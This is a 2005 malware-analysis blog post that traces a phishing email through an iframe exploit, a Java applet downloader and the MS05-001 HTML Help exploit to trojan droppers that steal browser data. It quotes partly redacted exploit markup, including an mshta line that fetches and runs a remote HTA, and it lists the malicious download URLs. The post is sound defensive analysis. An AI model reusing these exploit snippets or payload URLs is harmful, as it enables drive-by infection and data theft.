Mixed Threat Part 2: They Come Through Emails!

The thing about this is that one malware creates a link of event which ultimately leads a system to be infected with a number of other malwares. From one malware the execution goes to another one until the flow is finished, which by this time the system is already infected with anything that comes up to the malware authors mind. It can be a trojan, a spyware even worms.

Here is a new example of this. The flow begins with an email which eventually leads to the system being infected by trojans…

Below is an email that was spammed just this October 22, 2005.



As you can see a link was provided by the email, fooling the user that it is a copy of the transaction invoice.

When this link is clicked it starts a chain of event which we now call the “Bouncing Malware” (ala SANS). =)
When loaded the site in the picture informs the user that an “INTERNAL SERVER ERROR” occurred. Below is a picture of the website.



No alarm there right?…Wrong!=) Looking at the source code of this site, it shows that it contains an iframe exploit, which loads these two

“http://nlpshoping.com/huindex.html”
“http://nlpshoping.com/estat.php”

The file estat.php turned out to be a “zero byte file”, but huindex.html is “very bad”.

From this html it loads the file http://nlpshoping.com/loader.exe using java applet.

Here is a code snippet from huindex.html

<APPLET CODE=”GetAccess.class” WIDTH=”1″ HEIGHT=”1″>
<PARAM NAME=”cabbase” VALUE= “{blocked}.jr”>
<param NAME=”ModulePath” value=”http://nlpshop{block}ader.exe”></applet>
</APPLET>

It then uses another exploit which allows http://nlpshoping.com/ppp.hta to be downloaded and run using vulnerability in HTML HELP (MS05-001)

<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11

style=”position:absolute;left:-1000″>

<PAR{BLOCKED}ommand” VALUE=”Related Topics”>

<PAR{BLOCKED}utton” VALUE=”Text:”>

<PAR{BLOCKED}indow” VALUE=”$global_blank”>

<PAR{BLOCKED}tem1″ VALUE=”command;javascript:document.links



[0].href=’EXEC=,mshta,http://nlpshoping.com/ppp.hta

CHM=ieshared.chm FILE=app_install.htm’%3Bdocument.links[0].click();”></OBJECT>

The file ppp.hta is a TROJAN DROPPER. It contains a vbscript which drops the file upgrade.exe in “c:windows”.

The files Upgrade.exe and loader.exe are just the same.

They download these exe files exe files

• http://nlpshoping.com/notepad.exe
  
  
• http://site.com/toolbar.exe1
  
  
• http://site.com/proxy.exe1
  
  
• http://site.com/4.exe1
  
  
• http://site.com/5.exe1

I tried getting the files from site.com but it was already down. But notepad.exe is still uploaded.

The file notepad.exe is also a TROJAN DROPPER. Among the files that it drops in the systems directory are

• winsetup.exe
  
  
• svchost.dll

All files have already been submitted to the service team and are waiting for their detection name.
So let’s review what we’ve got so far.

• an email that fools users into clicking a link.(http://nlpshoping.com/billing/order203401.html)
  
  
  
• a site (http://nlpshoping.com/billing/order203401.html) using IFRAME exploit loads another site (http://nlpshoping.com/huindex.html)
  
  
  
• huindex.html using an exploit in handling java applets loads a file named “LOADER.EXE”
  
  
  
• It also exploited a vulnerability in HTML HELP (MS05-001) to load the site http://nlpshoping.com/ppp.hta
  
  
  
• ppp.hta contains a vbs script which drops “UPGRADE.EXE”
  
  
  
• dont forget “UPGRADE.EXE” and “LOADER.EXE” are just the same file.
  
  
  
• These two files are just downloaders which downloads this file, http://nlpshoping.com/notepad.exe, among others but the other sites are already down.
  
  
  
• The file notepad.exe is a TROJAN DROPPER which installs another trojan in the system(winsetup.exe and svchost.dll).
  
  
  
• The files winsetup.exe and svchost.dll monitor internet explorer and steals user information.
  

whew! so this is why its called a “MIXED THREAT”.

But lets not forget, all these chain of events started with a single email. One that was made perfectly to make users believe that it was authentic. Actually the real reason for these “chain of events” to happen is when the user was fooled into clicking that link. Yes, he was social engineered, and so was used by the malware author for the execution of his trojan.

So as a fair warning, let’s be vigilant. Always check where your emails come from, and even then check the attachments if there are any. Plus of course it always helps to have a completely patched system.